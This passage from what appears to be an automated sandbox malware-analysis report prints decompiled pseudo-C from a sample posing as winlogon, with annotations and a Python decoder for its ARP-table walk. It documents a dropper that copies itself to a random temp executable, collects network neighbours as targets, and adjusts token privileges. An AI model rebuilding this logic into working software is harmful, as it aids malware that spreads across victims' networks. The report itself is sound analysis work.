    															__eflags = _t51;
    															if(__eflags != 0) {
    																_t61 = GetFileAttributesA( &_v1036); // executed
    																__eflags = _t61 - 0xffffffff;
    																__eflags = 0 | _t61 != 0xffffffff;
    																if(__eflags != 0) {
    																	L34:
    																	E00D6D520(_t112,  &_v2060, 0, 0x800);
    																	_t134 = _t134 + 0xc;
    																	GetModuleFileNameW(GetModuleHandleW(0),  &_v2060, 0x3ff);
    																	E00D65DD0(_t73, 0x1388,  &_v2060, _t112, _t120);
    																	ExitProcess(0); // executed
    																}
    															}
    															_t52 = E00D65C20(_t73, _t112, _t120, __eflags); // executed
    															__eflags = _t52;
    															if(_t52 != 0) {
    																goto L34;
    															}
    															__eflags = _v12 ^ _t125;
    															return E00D6ABE4(_v12 ^ _t125);
    														} else {
    															goto L29;
    														}
    													}
    												}
    												goto L37;
    												L29:
    												_t79 = _t79 + 1;
    												__eflags = _t79 - _t99;
    											} while (_t79 < _t99);
    											goto L30;
    										}
    									} else {
    										goto L6;
    									}
    								}
    							}
    							goto L37;
    							L6:
    							_t35 = _t35 + 1;
    							__eflags = _t35 - _t97;
    						} while (_t35 < _t97);
    						goto L7;
    					}
    				} else {
    					return 0;
    				}
    				L37:
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d66500 to 0x00d66770; 0x00000000 marks statements without an address.]

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00D6651C
    • GetModuleHandleA.KERNEL32(00000000,?,000003FF,?,00000000), ref: 00D6656C
    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00D66573
      • Part of subcall function 00D62B90: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00D62BC1
      • Part of subcall function 00D62B90: OpenProcessToken.ADVAPI32(00000000), ref: 00D62BC8
      • Part of subcall function 00D62B90: GetTokenInformation.KERNELBASE(?,00000003(TokenPrivileges),00000000,00000000,?), ref: 00D62C00
      • Part of subcall function 00D62B90: GetTokenInformation.KERNELBASE(?,00000003(TokenPrivileges),00000000,?,?), ref: 00D62C30
      • Part of subcall function 00D62B90: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00D62C79
      • Part of subcall function 00D62B90: AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,00000010,00000000,00000000), ref: 00D62CDA
      • Part of subcall function 00D62B90: CloseHandle.KERNEL32(FFFFFFFF), ref: 00D62D04
      • Part of subcall function 00D660F0: GetVersionExW.KERNEL32(00000114), ref: 00D66145
      • Part of subcall function 00D660F0: GetVersionExW.KERNEL32(00000114), ref: 00D66188
      • Part of subcall function 00D660F0: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D661A8
      • Part of subcall function 00D660F0: GetProcAddress.KERNEL32(00000000), ref: 00D661AF
      • Part of subcall function 00D660F0: GetCurrentProcess.KERNEL32(?), ref: 00D661D1
      • Part of subcall function 00D660F0: IsWow64Process.KERNELBASE(00000000), ref: 00D661D8
      • Part of subcall function 00D660F0: __Stoull.NTSTC_LIBCMT ref: 00D6622B
      • Part of subcall function 00D660F0: __Stoull.NTSTC_LIBCMT ref: 00D66242
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D63920: LogonUserA.ADVAPI32(?,?,?,00000003,00000000,?), ref: 00D63A3C
      • Part of subcall function 00D63920: GetLastError.KERNEL32(?,00000003,00000000,?,276B9783), ref: 00D63A48
      • Part of subcall function 00D63920: DeleteCriticalSection.KERNEL32(?,276B9783), ref: 00D63B4A
      • Part of subcall function 00D63230: CoCreateGuid.OLE32(?), ref: 00D633BF
      • Part of subcall function 00D63230: wsprintfW.USER32 ref: 00D6342A
      • Part of subcall function 00D63230: wsprintfW.USER32 ref: 00D6345D
      • Part of subcall function 00D63B90: InitializeCriticalSection.KERNEL32(?,276B9783), ref: 00D63BFD
      • Part of subcall function 00D63B90: DeleteCriticalSection.KERNEL32(?), ref: 00D63D5D
    Strings
    • invalid vector<T> subscript, xrefs: 00D6658D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 76%
    			// editor's note: builds "<GetTempPathA()>\_<random>.exe", the random part coming from E00D64140 (CryptGenRandom; 3 to 6 bytes, up to 256 draws per length), and appends the first name that GetFileAttributesA reports as absent to the caller's buffer (__ecx).
    			E00D63DA0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				char _v1032;
    				CHAR* _v1036;
    				signed int _t30;
    				intOrPtr _t36;
    				intOrPtr _t37;
    				short _t38;
    				intOrPtr _t39;
    				intOrPtr* _t44;
    				long _t46;
    				void _t47;
    				void _t48;
    				intOrPtr _t55;
    				short _t56;
    				void* _t60;
    				void* _t61;
    				intOrPtr* _t63;
    				intOrPtr* _t65;
    				intOrPtr _t68;
    				char _t69;
    				char _t70;
    				signed int _t72;
    				void* _t83;
    				void* _t84;
    				void* _t86;
    				signed int _t87;
    				void* _t88;
    				short* _t90;
    				void* _t91;
    				short* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				signed int _t106;
    
    				_t101 = __esi;
    				_t88 = __edi;
    				_t30 =  *0xd88004; // 0x276b9783
    				_v8 = _t30 ^ _t106;
    				_t60 = __ecx;
    				if(__ecx != 0) {
    					E00D6D520(__edi,  &_v1032, 0, 0x400);
    					GetTempPathA(0x300,  &_v1032);
    					_t63 =  &_v1032;
    					_t83 = _t63 + 1;
    					do {
    						_t36 =  *_t63;
    						_t63 = _t63 + 1;
    					} while (_t36 != 0);
    					_push(_t88);
    					if( *((char*)(_t106 + _t63 - _t83 - 0x405)) != 0x5c) {
    						_t100 =  &_v1032 - 1;
    						do {
    							_t55 =  *((intOrPtr*)(_t100 + 1));
    							_t100 = _t100 + 1;
    						} while (_t55 != 0);
    						_t56 = "\\"; // 0x5c
    						 *_t100 = _t56;
    					}
    					_t90 =  &_v1032 - 1;
    					asm("o16 nop [eax+eax]");
    					do {
    						_t37 =  *((intOrPtr*)(_t90 + 1));
    						_t90 = _t90 + 1;
    					} while (_t37 != 0);
    					_t38 = "_"; // 0x5f
    					_t65 =  &_v1032;
    					 *_t90 = _t38;
    					_t84 = _t65 + 1;
    					do {
    						_t39 =  *_t65;
    						_t65 = _t65 + 1;
    					} while (_t39 != 0);
    					_t41 =  &(( &_v1032)[_t65 - _t84]);
    					_t91 = 3;
    					_v1036 =  &(( &_v1032)[_t65 - _t84]);
    					_push(_t101);
    					do {
    						_t102 = 0;
    						do {
    							E00D64140(_t41, _t91, _t102); // executed
    							_t44 =  &_v1032 - 1;
    							do {
    								_t68 =  *((intOrPtr*)(_t44 + 1));
    								_t44 = _t44 + 1;
    							} while (_t68 != 0);
    							_t69 = ".exe"; // 0x6578652e
    							 *_t44 = _t69;
    							_t70 =  *0xd84c14; // 0x0
    							 *((char*)(_t44 + 4)) = _t70;
    							_t46 = GetFileAttributesA( &_v1032); // executed
    							if(_t46 == 0xffffffff) {
    								_t86 =  &_v1032;
    								_t103 = _t86;
    								do {
    									_t47 =  *_t86;
    									_t86 = _t86 + 1;
    								} while (_t47 != 0);
    								_t87 = _t86 - _t103;
    								_t61 = _t60 - 1;
    								asm("o16 nop [eax+eax]");
    								do {
    									_t48 =  *(_t61 + 1);
    									_t61 = _t61 + 1;
    								} while (_t48 != 0);
    								_t72 = _t87 >> 2;
    								memcpy(_t61, _t103, _t72 << 2);
    								memcpy(_t103 + _t72 + _t72, _t103, _t87 & 0x00000003);
    								return E00D6ABE4(_v8 ^ _t106);
    							} else {
    								goto L17;
    							}
    							goto L25;
    							L17:
    							_t41 = _v1036;
    							_t102 = _t102 + 1;
    						} while (_t102 < 0x100);
    						_t91 = _t91 + 1;
    					} while (_t91 <= 6);
    					return E00D6ABE4(_v8 ^ _t106);
    				} else {
    					return E00D6ABE4(_v8 ^ _t106);
    				}
    				L25:
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d63da0 to 0x00d63f2d; 0x00000000 marks statements without an address.]

    APIs
    • GetTempPathA.KERNEL32(00000300,?), ref: 00D63DED
      • Part of subcall function 00D64140: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,?,?,?,00D63E8B), ref: 00D6418B
      • Part of subcall function 00D64140: CryptGenRandom.ADVAPI32(00000000,00000003,00000000,00000000,?,?,?,00D63E8B), ref: 00D6419B
      • Part of subcall function 00D64140: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00D63E8B), ref: 00D641A8
    • GetFileAttributesA.KERNELBASE(?), ref: 00D63EB4
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 47%
    			// editor's note: probes GetIpNetTable for the required size, grows the buffer on ERROR_INSUFFICIENT_BUFFER (0x7a) to 0x1c + 24*n, then walks the MIB_IPNETROW entries (first dwAddr at +0x14, stride 0x18), byte-swapping each IPv4 address and, after a lookup through E00D67C20, inserting it into the caller's list (_a4) under that list's critical section; the swap loop that follows the insert is the list being reversed.
    			E00D66DD0(void* __ecx, void* __edi, void* __eflags, char _a4) {
    				signed int _v8;
    				char _v12;
    				char _v16;
    				intOrPtr* _v20;
    				void* __ebx;
    				void* __ebp;
    				intOrPtr* _t25;
    				void* _t27;
    				intOrPtr* _t31;
    				intOrPtr* _t36;
    				intOrPtr* _t43;
    				intOrPtr* _t44;
    				intOrPtr _t49;
    				void* _t50;
    				intOrPtr* _t51;
    				intOrPtr* _t53;
    				intOrPtr* _t54;
    				intOrPtr _t56;
    				struct _CRITICAL_SECTION* _t57;
    				void* _t58;
    				void* _t59;
    
    				_t50 = __edi;
    				_v8 = 1;
    				_t25 = E00D702C9(__ecx);
    				_t53 = __imp__GetIpNetTable;
    				_t59 = _t58 + 4;
    				_t44 = _t25;
    				_t27 =  *_t53(_t44,  &_v8, 1, 0x34); // executed
    				if(_t27 == 0x7a) {
    					_push(0x1c + (_v8 + _v8 * 2) * 8);
    					_push(_t44);
    					_t43 = E00D6E77B(_t44, __ecx);
    					_t59 = _t59 + 8;
    					_t44 = _t43;
    				}
    				 *_t53(_t44,  &_v8, 1); // executed
    				_v16 = 0;
    				if( *_t44 > 0) {
    					_t10 = _t44 + 0x14; // 0x14
    					_t31 = _t10;
    					_push(_t50);
    					_t51 = _a4;
    					_v20 = _t31;
    					do {
    						asm("bswap eax");
    						_v12 =  *_t31;
    						_a4 = 0;
    						if(E00D67C20(_t44, _t51, _t51,  &_v12,  &_a4) != 0 && _a4 == 0) {
    							_t57 = _t51 + 0xc;
    							EnterCriticalSection(_t57);
    							E00D67B20(_t44, _t51, _t51,  &_v12);
    							LeaveCriticalSection(_t57);
    						}
    						_t36 =  *((intOrPtr*)(_t51 + 4));
    						_t54 =  *_t51;
    						if(_t54 != _t36) {
    							while(1) {
    								_t36 = _t36 - 4;
    								if(_t54 == _t36) {
    									goto L11;
    								}
    								_t49 =  *_t54;
    								 *_t54 =  *_t36;
    								_t54 = _t54 + 4;
    								 *_t36 = _t49;
    								if(_t54 != _t36) {
    									continue;
    								}
    								goto L11;
    							}
    						}
    						L11:
    						_t56 = _v16 + 1;
    						_t31 = _v20 + 0x18;
    						_v16 = _t56;
    						_v20 = _t31;
    					} while (_t56 <  *_t44);
    				}
    				return E00D7009A(_t44);
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d66dd0 to 0x00d66ec9; 0x00000000 marks statements without an address.]

    APIs
    • GetIpNetTable.IPHLPAPI(00000000,00000001,00000001), ref: 00D66DF8
    • GetIpNetTable.IPHLPAPI(00000000,00000001,00000001), ref: 00D66E1F
      • Part of subcall function 00D67C20: EnterCriticalSection.KERNEL32(?,00D655C6,?,?,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?), ref: 00D67C47
      • Part of subcall function 00D67C20: LeaveCriticalSection.KERNEL32(00D655C6,?,vector<T> too long,00000000,?,?,?,00D6763D,?,?,?,?,?,?,00D655C6,?), ref: 00D67C79
    • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 00D66E6B
    • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 00D66E7D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
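The walk in E00D66DD0 above reads a DWORD at `_t44 + 0x14`, advances `_v20` by `0x18` per row and byte-swaps the value before handing it on. As an added example (not code from the sample or from Joe Sandbox), the Python below decodes a constructed MIB_IPNETTABLE buffer with exactly those offsets, which confirms that the loop enumerates the IPv4 address of every ARP-cache neighbour: the 0x7a the first call is compared against is ERROR_INSUFFICIENT_BUFFER, and 0x1c + 24*n is the resize. Field names follow the public MIB_IPNETROW definition; the two neighbour rows are constructed for the test and are not from the analysis.

```python
"""Decode a MIB_IPNETTABLE buffer the way E00D66DD0 walks it (added example, not code from the sample or the report)."""
import ipaddress
import struct

# MIB_IPNETROW (iphlpapi.h): DWORD dwIndex, DWORD dwPhysAddrLen, BYTE bPhysAddr[8], DWORD dwAddr, DWORD dwType
ROW = struct.Struct("<II8sII")            # 24 bytes = the 0x18 stride in the listing
MIB_IPNET_TYPE = {1: "other", 2: "invalid", 3: "dynamic", 4: "static"}
ERROR_INSUFFICIENT_BUFFER = 0x7A          # the value the first GetIpNetTable call is compared against


def alloc_size(num_entries: int) -> int:
    """Size the listing allocates after the probe: 0x1c + 24*n (count DWORD plus n+1 rows)."""
    return 0x1C + num_entries * ROW.size


def build_table(rows) -> bytes:
    """Constructed stand-in for what GetIpNetTable writes: DWORD dwNumEntries followed by the rows."""
    buf = struct.pack("<I", len(rows))
    for if_index, mac, ip, typ in rows:
        # dwAddr holds the IPv4 address in network byte order, so the raw DWORD reads as little-endian.
        addr_dword = int.from_bytes(ipaddress.IPv4Address(ip).packed, "little")
        buf += ROW.pack(if_index, len(mac), mac.ljust(8, b"\0"), addr_dword, typ)
    return buf


def arp_targets(buf: bytes):
    """Return (ip, mac, type) per row; offsets mirror the listing (row 0's dwAddr sits at +0x14)."""
    (count,) = struct.unpack_from("<I", buf, 0)
    targets = []
    for i in range(count):
        off = 4 + i * ROW.size
        _if_index, plen, phys, addr_dword, typ = ROW.unpack_from(buf, off)
        host_order = int.from_bytes(addr_dword.to_bytes(4, "little"), "big")   # the 'bswap eax'
        targets.append((str(ipaddress.IPv4Address(host_order)),
                        phys[:plen].hex(":"),
                        MIB_IPNET_TYPE.get(typ, typ)))
    return targets


# Constructed sample: two neighbours on interface 7 (not taken from the analysis).
SAMPLE_TABLE = build_table([
    (7, bytes.fromhex("001122334455"), "10.0.0.5", 3),
    (7, bytes.fromhex("aabbccddeeff"), "192.168.1.1", 4),
])

if __name__ == "__main__":
    for ip, mac, kind in arp_targets(SAMPLE_TABLE):
        print(f"{ip:<16} {mac} {kind}")
```

Running it prints one ip/mac/type line per row. The swap loop after the insert in the listing (exchanging `*_t54` and `*_t36` from both ends of the 4-byte entries) is a reversal of the caller's list, so the sample ends up with its targets in the opposite order from the table; that ordering is not reproduced here.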
    C-Code - Quality: 86%
    			// editor's note: reads the file named by _a4 into a newly allocated buffer (pointer stored at *__ecx, length at __ecx[1]); files whose size has a non-zero high DWORD (4 GiB or more) are skipped, and on any failure the buffer is released and 0 returned.
    			E00D61DD0(void* __ebx, intOrPtr* __ecx, WCHAR* _a4) {
    				long _v8;
    				long _v12;
    				void* _t13;
    				long _t16;
    				void* _t21;
    				void* _t24;
    				struct _OVERLAPPED* _t25;
    				long _t28;
    				void* _t31;
    				struct _SECURITY_ATTRIBUTES** _t32;
    				void* _t33;
    
    				_t27 = __ecx;
    				_t24 = __ebx;
    				_t32 = __ecx;
    				_t12 =  *__ecx;
    				if( *__ecx != 0) {
    					E00D7009A(_t12);
    					_t33 = _t33 + 4;
    				}
    				 *_t32 = 0;
    				_t32[1] = 0;
    				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_t31 = _t13;
    				if(_t31 == 0 || _t31 == 0xcccccccc || _t31 == 0xffffffff) {
    					return 0;
    				} else {
    					_push(_t24);
    					_v8 = 0;
    					_t25 = 0;
    					_t16 = GetFileSize(_t31,  &_v8);
    					_a4 = _t16;
    					if(_v8 == 0) {
    						_push(_t16); // executed
    						_t21 = E00D702C9(_t27); // executed
    						_t33 = _t33 + 4;
    						 *_t32 = _t21;
    						if(_t21 != 0) {
    							_t28 = _a4;
    							_t32[1] = _t28;
    							_v12 = 0;
    							ReadFile(_t31, _t21, _t28,  &_v12, 0); // executed
    							_t25 =  !=  ? 1 : 0;
    						}
    					}
    					CloseHandle(_t31);
    					if(_t25 == 0) {
    						_t19 =  *_t32;
    						if( *_t32 != 0) {
    							E00D7009A(_t19);
    						}
    						 *_t32 = 0;
    						_t32[1] = 0;
    					}
    					return _t25;
    				}
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d61dd0 to 0x00d61eaf; 0x00000000 marks statements without an address.]

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D61E08
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00D61E38
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00D61E66
    • CloseHandle.KERNEL32(00000000), ref: 00D61E77
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 85%
    			// editor's note: dropper step: obtains the random %TEMP% name from E00D63DA0, copies the running image (GetModuleFileNameA) there with CopyFileA, and on success writes the new path into the caller's buffer (__ecx).
    			E00D64040(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				char _v1032;
    				char _v2056;
    				signed int _t16;
    				void* _t20;
    				int _t30;
    				long _t34;
    				char _t36;
    				intOrPtr* _t46;
    				void* _t53;
    				void* _t54;
    				signed int _t55;
    
    				_t51 = __edi;
    				_t16 =  *0xd88004; // 0x276b9783
    				_v8 = _t16 ^ _t55;
    				_t53 = __ecx;
    				if(__ecx != 0) {
    					E00D6D520(__edi,  &_v1032, 0, 0x400);
    					_t20 = E00D63DA0(__ebx,  &_v1032, _t51, _t53); // executed
    					if(_t20 == 0) {
    						goto L1;
    					} else {
    						E00D6D520(_t51,  &_v2056, 0, 0x400);
    						GetModuleFileNameA(GetModuleHandleA(0),  &_v2056, 0x3ff);
    						_t30 = CopyFileA( &_v2056,  &_v1032, 0); // executed
    						if(_t30 == 0) {
    							L8:
    							return E00D6ABE4(_v8 ^ _t55);
    						} else {
    							_t34 = GetFileAttributesA( &_v1032); // executed
    							if(_t34 == 0xffffffff) {
    								goto L8;
    							} else {
    								_t46 =  &_v1032;
    								_t54 = _t53 - _t46;
    								do {
    									_t36 =  *_t46;
    									_t46 = _t46 + 1;
    									 *((char*)(_t54 + _t46 - 1)) = _t36;
    								} while (_t36 != 0);
    								return E00D6ABE4(_v8 ^ _t55);
    							}
    						}
    					}
    				} else {
    					L1:
    					return E00D6ABE4(_v8 ^ _t55);
    				}
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d64040 to 0x00d64130; 0x00000000 marks statements without an address.]

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D63DA0: GetTempPathA.KERNEL32(00000300,?), ref: 00D63DED
      • Part of subcall function 00D63DA0: GetFileAttributesA.KERNELBASE(?), ref: 00D63EB4
    • GetModuleHandleA.KERNEL32(00000000,?,000003FF), ref: 00D640B4
    • GetModuleFileNameA.KERNEL32(00000000), ref: 00D640BB
    • CopyFileA.KERNEL32(?,?,00000000), ref: 00D640D1
    • GetFileAttributesA.KERNELBASE(?), ref: 00D640E2
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 92%
    			// editor's note: writes the (pointer, length) pair at __edx to the file named by __ecx, opened with GENERIC_READ|GENERIC_WRITE and CREATE_ALWAYS, and deletes the file again if WriteFile fails.
    			E00D6A550(WCHAR* __ecx, void** __edx) {
    				long _v8;
    				void* _t5;
    				int _t7;
    				void** _t12;
    				int _t14;
    				WCHAR* _t19;
    				void* _t24;
    
    				_push(__ecx);
    				_t19 = __ecx;
    				_t12 = __edx;
    				if(__ecx == 0 || __edx == 0) {
    					L8:
    					return 0;
    				} else {
    					_t5 = CreateFileW(__ecx, 0xc0000000, 3, 0, 2, 0, 0); // executed
    					_t24 = _t5;
    					if(_t24 == 0 || _t24 == 0xcccccccc || _t24 == 0xffffffff) {
    						goto L8;
    					} else {
    						_v8 = 0;
    						_t7 = WriteFile(_t24,  *_t12, _t12[1],  &_v8, 0); // executed
    						_t14 = _t7;
    						CloseHandle(_t24);
    						if(_t14 == 0) {
    							DeleteFileW(_t19);
    						}
    						return _t14;
    					}
    				}
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d6a553 to 0x00d6a5ca; 0x00000000 marks statements without an address.]

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D6A573
    • WriteFile.KERNEL32(00000000,?,?,00D63200,00000000), ref: 00D6A59F
    • CloseHandle.KERNEL32(00000000), ref: 00D6A5A8
    • DeleteFileW.KERNEL32(?,?,?), ref: 00D6A5B3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 65%
    			// editor's note: this is the MSVC CRT's lazy DLL loader, not sample-specific logic: LoadLibraryExW with LOAD_LIBRARY_SEARCH_SYSTEM32 (0x800), falling back to a plain LoadLibraryExW when the OS rejects that flag (ERROR_INVALID_PARAMETER, 0x57); the handle is cached in a table at 0xd90f6c with the module names at 0xd7f5b8.
    			E00D6DF86(signed int _a4) {
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				signed int _t21;
    				WCHAR* _t22;
    				signed int* _t25;
    				void* _t27;
    
    				_t21 = _a4;
    				_t25 = 0xd90f6c + _t21 * 4;
    				asm("lock cmpxchg [edi], ecx");
    				if(0 == 0) {
    					_t22 =  *(0xd7f5b8 + _t21 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				asm("sbb eax, eax");
    				return  ~0x00000001 & 0;
    			}

    [Address column for the listing above (one address per statement, detached from the statements during extraction): 0x00d6df8a to 0x00d6e002; 0x00000000 marks statements without an address.]

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00D90F50,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx), ref: 00D6DFBE
    • GetLastError.KERNEL32(?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74), ref: 00D6DFCA
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx), ref: 00D6DFD8
    • FreeLibrary.KERNEL32(00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000), ref: 00D6DFFA
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 95%
    			E00D74CD3(signed int _a4) {
    				signed int _t9;
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				WCHAR* _t22;
    				signed int _t24;
    				signed int* _t25;
    				void* _t27;
    
    				_t9 = _a4;
    				_t25 = 0xd91468 + _t9 * 4;
    				_t24 =  *_t25;
    				if(_t24 == 0) {
    					_t22 =  *(0xd80680 + _t9 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				_t4 = _t24 + 1; // 0x276b9784
    				asm("sbb eax, eax");
    				return  ~_t4 & _t24;
    			}

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue), ref: 00D74D05
    • GetLastError.KERNEL32(?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C), ref: 00D74D11
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000), ref: 00D74D1F
